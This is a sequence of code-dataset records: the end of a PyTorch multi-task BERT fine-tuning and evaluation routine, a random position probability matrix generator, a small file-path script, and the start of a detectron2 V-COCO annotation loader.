verbose=verbose)\n\n # build or make dictionaries\n _dev_path = args.dev_path if args.dev_path is not None else args.train_path\n word_dictionary, word_norm_dictionary, char_dictionary, pos_dictionary, \\\n xpos_dictionary, type_dictionary = \\\n conllu_data.load_dict(dict_path=dict_path,\n train_path=args.train_path if run_mode == \"train\" else None,\n dev_path=args.dev_path if run_mode == \"train\" else None,\n test_path=None,\n word_embed_dict={},\n dry_run=False,\n expand_vocab=False,\n word_normalization=True,\n force_new_dic=True if run_mode == \"train\" else False,\n tasks=args.tasks,\n pos_specific_data_set=args.train_path[1] if len(args.tasks) > 1 and len(args.train_path)>1 and \"pos\" in args.tasks else None,\n case=args.case,\n # if none of normalize, pos or parsing is in tasks we don't need the dictionaries\n do_not_fill_dictionaries=len(set([\"normalize\", \"pos\", \"parsing\"])&set([task for tasks in args.tasks for task in tasks])) == 0,\n add_start_char=1 if run_mode == \"train\" else None,\n verbose=verbose)\n # we flatten the tasks\n printing(\"DICTIONARY CREATED/LOADED\", verbose=verbose, verbose_level=1)\n num_labels_per_task, task_to_label_dictionary = get_vocab_size_and_dictionary_per_task([task for tasks in args.tasks for task in tasks],
\n vocab_bert_wordpieces_len=vocab_size,\n pos_dictionary=pos_dictionary,\n type_dictionary=type_dictionary,\n task_parameters=TASKS_PARAMETER)\n voc_pos_size = num_labels_per_task[\"pos\"] if \"pos\" in args.tasks else None\n if voc_pos_size is not None:\n printing(\"MODEL : voc_pos_size defined as {}\", var=voc_pos_size, verbose_level=1, verbose=verbose)\n printing(\"MODEL init...\", verbose=verbose, verbose_level=1)\n if verbose>1:\n print(\"DEBUG : TOKENIZER : voc_tokenizer from_pretrained\", voc_tokenizer)\n #pdb.set_trace()\n #voc_tokenizer = \"bert-base-multilingual-cased\"\n tokenizer = tokenizer.from_pretrained(voc_tokenizer, do_lower_case=args.case == \"lower\",shuffle_bpe_embedding=args.shuffle_bpe_embedding)\n mask_id = tokenizer.convert_tokens_to_ids(tokenizer.mask_token) #convert_tokens_to_ids([MASK_BERT])[0]\n printout_allocated_gpu_memory(verbose, \"{} loading model \".format(model_id))\n model = get_model_multi_task_bert(args=args, model_dir=model_dir, encoder=encoder,\n num_labels_per_task=num_labels_per_task, mask_id=mask_id)\n\n def prune_heads(prune_heads):\n if prune_heads is not None:\n pune_heads_ls = prune_heads.split(\",\")[:-1]\n assert len(pune_heads_ls) > 0\n for layer in pune_heads_ls:\n parsed_layer_to_prune = layer.split(\"-\")\n assert parsed_layer_to_prune[0] == \"prune_heads\"\n assert parsed_layer_to_prune[1] == \"layer\"\n assert parsed_layer_to_prune[3] == \"heads\"\n heads = parsed_layer_to_prune[4]\n head_index_ls = heads.split(\"_\")\n heads_ls = [int(index) for index in head_index_ls]\n print(f\"MODEL : pruning layer {parsed_layer_to_prune[2]} heads {heads_ls}\")\n model.encoder.encoder.layer[int(parsed_layer_to_prune[2])].attention.prune_heads(heads_ls)\n if args.prune_heads is not None and args.prune_heads!=\"None\":\n print(f\"INFO : args.prune_heads {args.prune_heads}\")\n prune_heads(args.prune_heads)\n\n if use_gpu:\n model.to(\"cuda\")\n printing(\"MODEL TO CUDA\", verbose=verbose, verbose_level=1)\n printing(\"MODEL model.config {} \", var=[model.config], verbose=verbose, verbose_level=1)\n printout_allocated_gpu_memory(verbose, \"{} model loaded\".format(model_id))\n model_origin = OrderedDict()\n pruning_mask = OrderedDict()\n printout_allocated_gpu_memory(verbose, \"{} model cuda\".format(model_id))\n for name, param in model.named_parameters():\n model_origin[name] = param.detach().clone()\n printout_allocated_gpu_memory(verbose, \"{} param cloned \".format(name))\n if args.penalization_mode == \"pruning\":\n abs = torch.abs(param.detach().flatten())\n median_value = torch.median(abs)\n pruning_mask[name] = (abs > median_value).float()\n printout_allocated_gpu_memory(verbose, \"{} pruning mask loaded\".format(model_id))\n\n printout_allocated_gpu_memory(verbose, \"{} model clone\".format(model_id))\n\n inv_word_dic = word_dictionary.instance2index\n # load, mask, bucket and index data\n\n assert tokenizer is not None, \"ERROR : tokenizer is None , voc_tokenizer failed to be loaded {}\".format(voc_tokenizer)\n if run_mode == \"train\":\n time_load_readers_train_start = time.time()\n if not args.memory_efficient_iterator:\n\n data_sharded, n_shards, n_sent_dataset_total_train = None, None, None\n args_load_batcher_shard_data = None\n printing(\"INFO : starting loading readers\", verbose=verbose, verbose_level=1)\n readers_train = readers_load(datasets=args.train_path,\n tasks=args.tasks,\n word_dictionary=word_dictionary,\n bert_tokenizer=tokenizer,\n word_dictionary_norm=word_norm_dictionary, char_dictionary=char_dictionary,
\n pos_dictionary=pos_dictionary, xpos_dictionary=xpos_dictionary,\n type_dictionary=type_dictionary,\n word_decoder=True,\n run_mode=run_mode,\n add_start_char=1, add_end_char=1, symbolic_end=1,\n symbolic_root=1, bucket=True,\n must_get_norm=True, input_level_ls=input_level_ls,\n verbose=verbose)\n n_sent_dataset_total_train = readers_train[list(readers_train.keys())[0]][3]\n printing(\"INFO : done with sharding\", verbose=verbose, verbose_level=1)\n else:\n printing(\"INFO : building/loading shards \", verbose=verbose, verbose_level=1)\n data_sharded, n_shards, n_sent_dataset_total_train = build_shard(data_sharded, args.train_path, n_sent_max_per_file=N_SENT_MAX_CONLL_PER_SHARD, verbose=verbose)\n\n time_load_readers_dev_start = time.time()\n time_load_readers_train = time.time()-time_load_readers_train_start\n readers_dev_ls = []\n dev_data_label_ls = []\n printing(\"INFO : loading readers for dev\", verbose=verbose, verbose_level=1)\n printout_allocated_gpu_memory(verbose, \"{} reader train loaded\".format(model_id))\n for dev_path in args.dev_path:\n dev_data_label = get_dataset_label(dev_path, default=\"dev\")\n dev_data_label_ls.append(dev_data_label)\n readers_dev = readers_load(datasets=dev_path, tasks=args.tasks, word_dictionary=word_dictionary,\n word_dictionary_norm=word_norm_dictionary, char_dictionary=char_dictionary,\n pos_dictionary=pos_dictionary, xpos_dictionary=xpos_dictionary,\n bert_tokenizer=tokenizer,\n type_dictionary=type_dictionary,\n word_decoder=True, run_mode=run_mode,\n add_start_char=1, add_end_char=1,\n symbolic_end=1, symbolic_root=1, bucket=False,\n must_get_norm=True,input_level_ls=input_level_ls,\n verbose=verbose) if args.dev_path is not None else None\n readers_dev_ls.append(readers_dev)\n printout_allocated_gpu_memory(verbose, \"{} reader dev loaded\".format(model_id))\n\n time_load_readers_dev = time.time()-time_load_readers_dev_start\n # report reader loading times\n printing(\"TIME : {} \", var=[OrderedDict([(\"time_load_readers_train\", \"{:0.4f} min\".format(time_load_readers_train/60)), (\"time_load_readers_dev\", \"{:0.4f} min\".format(time_load_readers_dev/60))])],\n verbose=verbose, verbose_level=2)\n\n early_stoping_val_former = 1000\n # training starts when epoch is 1\n #args.epochs += 1\n #assert args.epochs >= 1, \"ERROR need at least 2 epochs (1 eval , 1 train 1 eval\"\n flexible_batch_size = False\n \n if args.optimizer == \"AdamW\":\n model, optimizer, scheduler = apply_fine_tuning_strategy(model=model,\n fine_tuning_strategy=args.fine_tuning_strategy,\n lr_init=args.lr, betas=(0.9, 0.99),epoch=0,\n weight_decay=args.weight_decay,\n optimizer_name=args.optimizer,\n t_total=n_sent_dataset_total_train / args.batch_update_train * args.epochs if n_sent_dataset_total_train / args.batch_update_train * args.epochs > 1 else 5,\n verbose=verbose)\n\n try:\n for epoch in range(args.epochs):\n if args.memory_efficient_iterator:\n # we start each epoch with a new shard every time!\n training_file = get_new_shard(data_sharded, n_shards)\n printing(\"INFO : memory efficient iterator triggered (only built for train data), starting with {}\",\n var=[training_file], verbose=verbose, verbose_level=1)\n args_load_batcher_shard_data = {\"word_dictionary\": word_dictionary, \"tokenizer\": tokenizer,\n \"word_norm_dictionary\": word_norm_dictionary,\n \"char_dictionary\": char_dictionary,\n \"pos_dictionary\": pos_dictionary,\n \"xpos_dictionary\": xpos_dictionary,\n \"type_dictionary\": type_dictionary, \"use_gpu\": use_gpu,\n \"norm_not_norm\": 
auxilliary_task_norm_not_norm,\n \"word_decoder\": True,\n \"add_start_char\": 1, \"add_end_char\": 1, \"symbolic_end\": 1,\n \"symbolic_root\": 1,\n \"bucket\": True, \"max_char_len\": 20, \"must_get_norm\": True,\n \"use_gpu_hardcoded_readers\": False,\n \"bucketing_level\": \"bpe\", \"input_level_ls\": [\"wordpiece\"],\n \"auxilliary_task_norm_not_norm\": auxilliary_task_norm_not_norm,\n \"random_iterator_train\": random_iterator_train\n }\n\n readers_train = readers_load(datasets=args.train_path if not args.memory_efficient_iterator else training_file,\n tasks=args.tasks, word_dictionary=word_dictionary,\n bert_tokenizer=tokenizer, word_dictionary_norm=word_norm_dictionary, char_dictionary=char_dictionary,\n pos_dictionary=pos_dictionary, xpos_dictionary=xpos_dictionary,\n type_dictionary=type_dictionary,\n word_decoder=True, run_mode=run_mode,\n add_start_char=1, add_end_char=1, symbolic_end=1,\n symbolic_root=1, bucket=True,\n must_get_norm=True, input_level_ls=input_level_ls, verbose=verbose)\n\n checkpointing_model_data = (epoch % saving_every_epoch == 0 or epoch == (args.epochs - 1))\n # build iterator on the loaded data\n printout_allocated_gpu_memory(verbose, \"{} loading batcher\".format(model_id))\n\n\n if args.batch_size == \"flexible\":\n flexible_batch_size = True\n\n printing(\"INFO : args.batch_size {} so updating it based on mean value {}\",\n var=[args.batch_size, update_batch_size_mean(readers_train)],\n verbose=verbose, verbose_level=1)\n args.batch_size = update_batch_size_mean(readers_train)\n\n if args.batch_update_train == \"flexible\":\n args.batch_update_train = args.batch_size\n printing(\"TRAINING : backward pass every {} step of size {} in average\",\n var=[int(args.batch_update_train // args.batch_size), args.batch_size],\n verbose=verbose, verbose_level=1)\n try:\n assert isinstance(args.batch_update_train // args.batch_size, int)\\\n and args.batch_update_train // args.batch_size > 0, \\\n \"ERROR batch_size {} should be a multiple of {} \".format(args.batch_update_train, args.batch_size)\n except Exception as e:\n print(\"WARNING {}\".format(e))\n batchIter_train = data_gen_multi_task_sampling_batch(tasks=args.tasks,\n readers=readers_train,\n batch_size=readers_train[list(readers_train.keys())[0]][4],\n max_token_per_batch=max_token_per_batch if flexible_batch_size else None,\n word_dictionary=word_dictionary,\n char_dictionary=char_dictionary,\n pos_dictionary=pos_dictionary,\n word_dictionary_norm=word_norm_dictionary,\n get_batch_mode=random_iterator_train,\n print_raw=False,\n dropout_input=0.0,\n verbose=verbose)\n\n # -|-|-\n printout_allocated_gpu_memory(verbose, \"{} batcher train loaded\".format(model_id))\n batchIter_dev_ls = []\n batch_size_DEV = 1\n\n if verbose > 1:\n print(\"WARNING : batch_size for final eval was hardcoded and set to {}\".format(batch_size_DEV))\n for readers_dev in readers_dev_ls:\n batchIter_dev = data_gen_multi_task_sampling_batch(tasks=args.tasks, readers=readers_dev,\n batch_size=batch_size_DEV,\n word_dictionary=word_dictionary,\n char_dictionary=char_dictionary,\n pos_dictionary=pos_dictionary,\n word_dictionary_norm=word_norm_dictionary,\n get_batch_mode=False,\n print_raw=False,\n\n dropout_input=0.0,\n verbose=verbose) if args.dev_path is not None else None\n batchIter_dev_ls.append(batchIter_dev)\n\n\n model.train()\n printout_allocated_gpu_memory(verbose, \"{} batcher dev loaded\".format(model_id))\n if args.optimizer != \"AdamW\":\n\n model, optimizer, scheduler = apply_fine_tuning_strategy(model=model,\n 
fine_tuning_strategy=args.fine_tuning_strategy,\n lr_init=args.lr, betas=(0.9, 0.99),\n weight_decay=args.weight_decay,\n optimizer_name=args.optimizer,\n t_total=n_sent_dataset_total_train / args.batch_update_train * args.epochs if n_sent_dataset_total_train / args.batch_update_train*args.epochs > 1 else 5,\n epoch=epoch, verbose=verbose)\n printout_allocated_gpu_memory(verbose, \"{} optimizer loaded\".format(model_id))\n loss_train = None\n\n if epoch >= 0:\n printing(\"TRAINING : training on GET_BATCH_MODE \", verbose=verbose, verbose_level=2)\n printing(\"TRAINING {} training 1 'epoch' = {} observation size args.batch_\"\n \"update_train (forward {} batch_size {} backward \"\n \"(every int(args.batch_update_train//args.batch_size) step if {})) \",\n var=[model_id, n_observation_max_per_epoch_train, args.batch_size, args.batch_update_train,\n args.low_memory_foot_print_batch_mode],\n verbose=verbose, verbose_level=1)\n loss_train, iter_train, perf_report_train, _ = epoch_run(batchIter_train, tokenizer,\n args=args,\n model_origin=model_origin,\n pruning_mask=pruning_mask,\n task_to_label_dictionary=task_to_label_dictionary,\n data_label=train_data_label,\n model=model,\n dropout_input_bpe=args.dropout_input_bpe,\n writer=writer,\n iter=iter_train, epoch=epoch,\n writing_pred=epoch == (args.epochs - 1),\n dir_end_pred=end_predictions,\n optimizer=optimizer, use_gpu=use_gpu,\n scheduler=scheduler,\n predict_mode=(epoch-1)%5 == 0,\n skip_1_t_n=skip_1_t_n,\n model_id=model_id,\n reference_word_dic={\"InV\": inv_word_dic},\n null_token_index=null_token_index, null_str=null_str,\n norm_2_noise_eval=False,\n early_stoppin_metric=None,\n n_obs_max=n_observation_max_per_epoch_train,\n data_sharded_dir=data_sharded,\n n_shards=n_shards,\n n_sent_dataset_total=n_sent_dataset_total_train,\n args_load_batcher_shard_data=args_load_batcher_shard_data,\n memory_efficient_iterator=args.memory_efficient_iterator,\n verbose=verbose)\n\n else:\n printing(\"TRAINING : skipping first epoch to start by evaluating on dev datasets\", verbose=verbose, verbose_level=1)\n printout_allocated_gpu_memory(verbose, \"{} epoch train done\".format(model_id))\n model.eval()\n\n if args.dev_path is not None and (epoch%3==0 or epoch<=6):\n if verbose > 1:\n print(\"RUNNING DEV on ITERATION MODE\")\n early_stoping_val_ls = []\n loss_dev_ls = []\n for i_dev, batchIter_dev in enumerate(batchIter_dev_ls):\n loss_dev, iter_dev, perf_report_dev, early_stoping_val = epoch_run(batchIter_dev, tokenizer,\n args=args,\n epoch=epoch,\n model_origin=model_origin,\n pruning_mask=pruning_mask,\n task_to_label_dictionary=task_to_label_dictionary,\n iter=iter_dev, use_gpu=use_gpu,\n model=model,\n writer=writer,\n optimizer=None,\n writing_pred=True,#epoch == (args.epochs - 1),\n dir_end_pred=end_predictions,\n predict_mode=True,\n data_label=dev_data_label_ls[i_dev],\n null_token_index=null_token_index,\n null_str=null_str,\n model_id=model_id,\n skip_1_t_n=skip_1_t_n,\n dropout_input_bpe=0,\n reference_word_dic={\"InV\": inv_word_dic},\n norm_2_noise_eval=False,\n early_stoppin_metric=early_stoppin_metric,\n subsample_early_stoping_metric_val=subsample_early_stoping_metric_val,\n #case=case,\n n_obs_max=n_observation_max_per_epoch_dev_test,\n verbose=verbose)\n\n printing(\"TRAINING : loss train:{} dev {}:{} for epoch {} out of {}\",\n var=[loss_train, i_dev, loss_dev, epoch, args.epochs], verbose=1, verbose_level=1)\n printing(\"PERFORMANCE {} DEV {} {} \", var=[epoch, i_dev+1, perf_report_dev], verbose=verbose,\n verbose_level=1)\n 
early_stoping_val_ls.append(early_stoping_val)\n loss_dev_ls.append(loss_dev)\n\n else:\n if verbose > 1:\n print(\"NO DEV EVAL\")\n loss_dev, iter_dev, perf_report_dev = None, 0, None\n # NB : early_stoping_val is based on first dev set\n printout_allocated_gpu_memory(verbose, \"{} epoch dev done\".format(model_id))\n\n early_stoping_val = early_stoping_val_ls[0]\n if checkpointing_model_data or early_stoping_val < early_stoping_val_former:\n if early_stoping_val is not None:\n _epoch = \"best\" if early_stoping_val < early_stoping_val_former else epoch\n else:\n if verbose > 1:\n print('WARNING early_stoping_val is None so saving based on checkpointing_model_data only')\n _epoch = epoch\n # model_id enriched possibly with some epoch informaiton if name_with_epoch\n _model_id = get_name_model_id_with_extra_name(epoch=epoch, _epoch=_epoch,\n name_with_epoch=name_with_epoch, model_id=model_id)\n checkpoint_dir = os.path.join(model_location, \"{}-checkpoint.pt\".format(_model_id))\n\n if _epoch == \"best\":\n printing(\"CHECKPOINT : SAVING BEST MODEL {} (epoch:{}) (new loss is {} former was {})\".format(checkpoint_dir, epoch, early_stoping_val, early_stoping_val_former), verbose=verbose, verbose_level=1)\n last_checkpoint_dir_best = checkpoint_dir\n early_stoping_val_former = early_stoping_val\n best_epoch = epoch\n best_loss = early_stoping_val\n else:\n printing(\"CHECKPOINT : NOT SAVING BEST MODEL : new loss {} did not beat first loss {}\".format(early_stoping_val , early_stoping_val_former), verbose_level=1, verbose=verbose)\n last_model = \"\"\n if epoch == (args.epochs - 1):\n last_model = \"last\"\n printing(\"CHECKPOINT : epoch {} saving {} model {} \", var=[epoch,last_model, checkpoint_dir], verbose=verbose,verbose_level=1)\n torch.save(model.state_dict(), checkpoint_dir)\n\n args_dir = write_args(dir=model_location, checkpoint_dir=checkpoint_dir,\n hyperparameters=hyperparameters if name_with_epoch else None,\n model_id=_model_id,\n info_checkpoint=OrderedDict([(\"epochs\", epoch+1),\n (\"batch_size\", args.batch_size if not args.low_memory_foot_print_batch_mode else args.batch_update_train),\n (\"train_path\", train_data_label), (\"dev_path\", dev_data_label_ls), (\"num_labels_per_task\", num_labels_per_task)]),\n verbose=verbose)\n\n if row is not None and update_status is not None:\n update_status(row=row, value=\"training-done\", verbose=1)\n except Exception as e:\n if row is not None and update_status is not None:\n update_status(row=row, value=\"ERROR\", verbose=1)\n raise(e)\n\n # reloading last (best) checkpoint\n if run_mode in [\"train\", \"test\"] and args.test_paths is not None:\n report_all = []\n if run_mode == \"train\" and args.epochs>0:\n if use_gpu:\n model.load_state_dict(torch.load(last_checkpoint_dir_best))\n model = model.cuda()\n printout_allocated_gpu_memory(verbose, \"{} after reloading model\".format(model_id))\n else:\n model.load_state_dict(torch.load(last_checkpoint_dir_best, map_location=lambda storage, loc: storage))\n printing(\"MODEL : RELOADING best model of epoch {} with loss {} based on {}({}) metric (from checkpoint {})\", var=[best_epoch, best_loss, early_stoppin_metric, subsample_early_stoping_metric_val, last_checkpoint_dir_best], verbose=verbose, verbose_level=1)\n\n model.eval()\n\n printout_allocated_gpu_memory(verbose, \"{} starting test\".format(model_id))\n for test_path in args.test_paths:\n assert len(test_path) == len(args.tasks), \"ERROR test_path {} args.tasks {}\".format(test_path, args.tasks)\n for test, task_to_eval in 
zip(test_path, args.tasks):\n label_data = get_dataset_label([test], default=\"test\")\n if len(extra_label_for_prediction) > 0:\n label_data += \"-\" + extra_label_for_prediction\n\n if args.shuffle_bpe_embedding and args.test_mode_no_shuffle_embedding:\n printing(\"TOKENIZER: as args.shuffle_bpe_embedding {} and test_mode_no_shuffle {} : reloading tokenizer with no shuffle_embedding\",\n var=[args.shuffle_bpe_embedding, args.test_mode_no_shuffle_embedding], verbose=1, verbose_level=1)\n tokenizer = tokenizer.from_pretrained(voc_tokenizer, do_lower_case=args.case == \"lower\", shuffle_bpe_embedding=False)\n readers_test = readers_load(datasets=[test],\n tasks=[task_to_eval],\n word_dictionary=word_dictionary,\n word_dictionary_norm=word_norm_dictionary,\n char_dictionary=char_dictionary,\n pos_dictionary=pos_dictionary,\n xpos_dictionary=xpos_dictionary,\n type_dictionary=type_dictionary,\n bert_tokenizer=tokenizer,\n word_decoder=True,\n run_mode=run_mode,\n add_start_char=1, add_end_char=1, symbolic_end=1,\n symbolic_root=1, bucket=bucket_test,\n input_level_ls=input_level_ls,\n must_get_norm=must_get_norm_test,\n verbose=verbose)\n\n heuritics_zip = [None]\n gold_error_or_not_zip = [False]\n norm2noise_zip = [False]\n\n if heuristic_test_ls is None:\n assert len(gold_error_or_not_zip) == len(heuritics_zip) and len(heuritics_zip) == len(norm2noise_zip)\n\n batch_size_TEST = 1\n if verbose>1:\n print(\"WARNING : batch_size for final eval was hardcoded and set to {}\".format(batch_size_TEST))\n for (heuristic_test, gold_error, norm_2_noise_eval) in zip(heuritics_zip, gold_error_or_not_zip, norm2noise_zip):\n\n assert heuristic_test is None and not gold_error and not norm_2_noise_eval\n\n batchIter_test = data_gen_multi_task_sampling_batch(tasks=[task_to_eval], readers=readers_test,\n batch_size=batch_size_TEST,\n word_dictionary=word_dictionary,\n char_dictionary=char_dictionary,\n pos_dictionary=pos_dictionary,\n word_dictionary_norm=word_norm_dictionary,\n get_batch_mode=False,\n dropout_input=0.0,\n verbose=verbose)\n try:\n loss_test, iter_test, perf_report_test, _ = epoch_run(batchIter_test, tokenizer,\n args=args,\n iter=iter_dev, use_gpu=use_gpu,\n model=model,\n task_to_label_dictionary=task_to_label_dictionary,\n writer=None,\n writing_pred=True,\n optimizer=None,\n args_dir=args_dir, model_id=model_id,\n dir_end_pred=end_predictions,\n skip_1_t_n=skip_1_t_n,\n predict_mode=True, data_label=label_data,\n epoch=\"LAST\", extra_label_for_prediction=label_data,\n null_token_index=null_token_index,\n null_str=null_str,\n log_perf=False,\n dropout_input_bpe=0,\n norm_2_noise_eval=norm_2_noise_eval,\n compute_intersection_score=compute_intersection_score_test,\n remove_mask_str_prediction=remove_mask_str_prediction,\n reference_word_dic={\"InV\": inv_word_dic},\n threshold_edit=threshold_edit,\n verbose=verbose,\n n_obs_max=n_observation_max_per_epoch_dev_test)\n if verbose>1:\n print(\"LOSS TEST\", loss_test)\n except Exception as e:\n print(\"ERROR (epoch_run test) {} test_path {} , heuristic {} , gold error {} , norm2noise {} \".format(e, test, heuristic_test, gold_error, norm_2_noise_eval))\n raise(e)\n print(\"PERFORMANCE TEST on data {} is {} \".format(label_data, perf_report_test))\n print(\"DATA WRITTEN {}\".format(end_predictions))\n if writer is not None:\n writer.add_text(\"Accuracy-{}-{}-{}\".format(model_id, label_data, run_mode),\n \"After {} epochs with {} : performance is \\n {} \".format(args.epochs, description,\n str(perf_report_test)), 0)\n else:\n 
printing(\"WARNING : could not add accuracy to tensorboard cause writer was found None\", verbose=verbose,\n verbose_level=2)\n report_all.extend(perf_report_test)\n printout_allocated_gpu_memory(verbose, \"{} test done\".format(model_id))\n else:\n printing(\"ERROR : EVALUATION none cause {} empty or run_mode {} \",\n var=[args.test_paths, run_mode], verbose_level=1, verbose=verbose)\n\n if writer is not None:\n writer.close()\n printing(\"tensorboard --logdir={} --host=localhost --port=1234 \", var=[tensorboard_log], verbose_level=1,verbose=verbose)\n\n report_dir = os.path.join(model_location, model_id+\"-report.json\")\n if report_full_path_shared is not None:\n report_full_dir = os.path.join(report_full_path_shared, args.overall_label + \"-report.json\")\n if os.path.isfile(report_full_dir):\n report = json.load(open(report_full_dir, \"r\"))\n else:\n report = []\n printing(\"REPORT = creating overall report at {} \", var=[report_dir], verbose=verbose, verbose_level=1)\n report.extend(report_all)\n json.dump(report, open(report_full_dir, \"w\"))\n printing(\"{} {} \", var=[REPORT_FLAG_DIR_STR, report_full_dir], verbose=0, verbose_level=0)\n\n json.dump(report_all, open(report_dir, \"w\"))\n printing(\"REPORTING TO {}\".format(report_dir), verbose=verbose, verbose_level=1)\n if report_full_path_shared is None:\n printing(\"WARNING ; report_full_path_shared is None\", verbose=verbose, verbose_level=1)\n printing(\"{} {} \", var=[REPORT_FLAG_DIR_STR, report_dir], verbose=verbose, verbose_level=0)\n\n return model\n","sub_path":"transfer/downstream/finetune/trainer/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":47421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"550516322","text":"import argparse\nimport numpy as np\nimport time\nfrom pathlib import Path\n\n\ndef randomPPMcreator(seq_length): \n sequence_ppm_arrays = [np.random.dirichlet(\n np.ones(4), size=1) for i in range(0, seq_length)]\n sequenceppm = [(ppm[0].tolist()) for ppm in sequence_ppm_arrays]\n return sequenceppm\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--number', '-n', type=int,\n help='Number of random PPMs user wants to create', default=1)\nparser.add_argument('--seq_length', '-sl', default=7, type=int,\n help='Number that specifies how long will be the random training sequence')\nparser.add_argument('--outfile', '-out', type=str, default='.',\n help='Specify absolute or relative path to output directory, default = .') \nargs = parser.parse_args()\n\n\n# preparing files and folders\nts = time.time()\n\np = Path(args.outfile)\n\noutput_folder = Path(f'{p}', 'results', 'preprocessed_pwms', 'random', f'{ts}')\noutput_folder.mkdir(parents=True, exist_ok=True)\n\n# creating dict with random PPMs\nseq_length = args.seq_length\n\nrandom_ppms = {}\nfor i in range(args.number):\n header = f'random_{i+1}_length_{seq_length}'\n ppm = randomPPMcreator(seq_length)\n random_ppms[header] = np.asarray(ppm)\n\n# processing output files\nfor header, ppm in random_ppms.items():\n output_file = f'{header}'\n output_file_path = output_folder / output_file\n np.save(output_file_path, ppm)","sub_path":"tools/pwm_prepr/create_random_PPM.py","file_name":"create_random_PPM.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"103262866","text":"# coding=UTF-8\r\nimport zipfile,os\r\n\r\n\r\npath = 
r'C:\\Users\\admin\\Desktop\\19套BSC最新License文件20180831'\r\n##list = os.listdir(path) #列出文件夹下所有的目录与文件\r\n##for i in range(0,len(list)):\r\n## fpath = os.path.join(path,list[i])\r\n## if os.path.splitext(fpath)[1].lower() =='.dat':\r\n## with open(fpath, 'r', encoding='utf-8') as f:\r\n## cont = f.read()\r\n## for esn in dic:\r\n## if cont.find(esn) != -1:\r\n## f.close()\r\n## lpath = path+'\\cbsclicense.dat'\r\n## os.mkdir(path + '\\\\'+ dic[esn])\r\n## os.rename(fpath,lpath)\r\n## shutil.move(lpath, path + '\\\\'+ dic[esn] + '\\cbsclicense.dat')\r\n## city = dic[esn][0:3] + 'License.zip'\r\n## break\r\n\r\ncity = '深圳License.zip'\r\nzipfilepath = os.path.join(path,city)\r\nmypath = path.split('\\\\')[-1]\r\nprint(mypath)\r\n","sub_path":"t.py","file_name":"t.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"144550214","text":"#Lesson 40 Practice 1-Writing your own segementation function\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nsns.set_style('dark')\n\nimport skimage.io\nimport skimage.filters\nimport skimage.measure\nimport skimage.segmentation\nfrom skimage import morphology\n\n#Load the image\n\n#file 1\n#im_phase = skimage.io.imread('data/bsub_100x_phase.tif')\n\n#file2\nim_phase = skimage.io.imread('data/bsub_100x_phase.tif')\n\n\n\n#histogram to figure out threshold\n#\n# hist_images, bins_images = skimage.exposure.histogram(im_phase)\n# plt.plot(bins_images,hist_images)\n# plt.xlabel('pixel value')\n# plt.ylabel('count')\n# plt.show()\n\ndef img_segmentation(im_phase, thresh):\n \"\"\"function to segment any phase contrast image of bacteria\"\"\"\n\n #display the original image\n plt.imshow(im_phase)\n plt.title ('Original Image')\n plt.show()\n\n #filter out noise using median filters\n # Make the structuring element\n selem = skimage.morphology.square(3)\n # Perform the median filter\n im_phase_med = skimage.filters.median(im_phase, selem)\n\n # Show filtered image with the viridis LUT.\n plt.imshow(im_phase_med, cmap=plt.cm.Greys_r)\n plt.colorbar()\n plt.title ('Median Filtered Image')\n plt.show()\n\n\n #apply a gaussian blur with a 50 pixel radius\n im_phase_gauss = skimage.filters.gaussian(im_phase, 50.0)\n\n #subtract the background\n # Convert the median-filtered phase image to a float64\n im_phase_float = skimage.img_as_float(im_phase_med)\n\n # Subtract our gaussian blurred image from the original.\n im_phase_sub = im_phase_float - im_phase_gauss\n\n #show images side by side (filtered median vs pic with\n #subtracted background)\n fig, ax = plt.subplots(1, 2, figsize=(9.5, 8))\n ax[0].imshow(im_phase_float, cmap=plt.cm.viridis)\n ax[1].imshow(im_phase_sub, cmap=plt.cm.viridis)\n plt.title ('Image With Uniform Background')\n plt.show()\n\n #generate threshold image\n im_phase_thresh = im_phase_med < thresh\n\n #show the result\n plt.imshow(im_phase_thresh)\n plt.title ('Threshold Image')\n plt.show()\n\n #removing objects that are too small\n im_phase_nosmall = morphology.remove_small_objects(im_phase_thresh, min_size=450)\n #min size was only 100 or 200 for the ecoli files, depends on the file type\n plt.imshow(im_phase_nosmall, cmap=plt.cm.Greys_r)\n plt.title ('Image Without Small Objects')\n plt.show()\n\n #removing objects on/close to the border\n im_phase_noborder=skimage.segmentation.clear_border(im_phase_nosmall,\n buffer_size=0.2)\n\n #show the result\n plt.imshow(im_phase_noborder, cmap=plt.cm.Greys_r)\n plt.title ('Final 
Image')\n plt.show()\n\nimg_segmentation(im_phase, 300)\n","sub_path":"imageprocessingfunction.py","file_name":"imageprocessingfunction.py","file_ext":"py","file_size_in_byte":2728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"602319563","text":"\nimport contextlib\nimport datetime\nimport io\nimport json\nimport logging\nimport numpy as np\nimport os\nimport pycocotools.mask as mask_util\nfrom fvcore.common.file_io import PathManager, file_lock\nfrom fvcore.common.timer import Timer\nfrom PIL import Image\n\nfrom detectron2.structures import Boxes, BoxMode, PolygonMasks\nfrom detectron2.data.catalog import DatasetCatalog, MetadataCatalog\n\n\"\"\"\nThis file contains functions to parse HOI annotations into dicts in \"Detectron2 format\".\n\"\"\"\n\n\nlogger = logging.getLogger(__name__)\n\n__all__ = [\"load_vcoco_json\"]\n\n\ndef load_vcoco_json(json_file, image_root, dataset_name=None, extra_annotation_keys=None):\n \"\"\"\n Load a json file with HOI's instances annotation format.\n\n Args:\n json_file (str): full path to the json file in HOI instances annotation format.\n image_root (str or path-like): the directory where the images in this json file exists.\n dataset_name (str): the name of the dataset (e.g., `vcoco_train`).\n If provided, this function will also put \"thing_classes\" into\n the metadata associated with this dataset.\n extra_annotation_keys (list[str]): list of per-annotation keys that should also be\n loaded into the dataset dict (besides \"iscrowd\", \"bbox\", \"keypoints\",\n \"category_id\", \"segmentation\"). The values for these keys will be returned as-is.\n For example, the densepose annotations are loaded in this way.\n\n Returns:\n list[dict]: a list of dicts in Detectron2 standard dataset dicts format. (See\n `Using Custom Datasets `_ )\n\n Notes:\n 1. This function does not read the image files.\n The results do not have the \"image\" field.\n 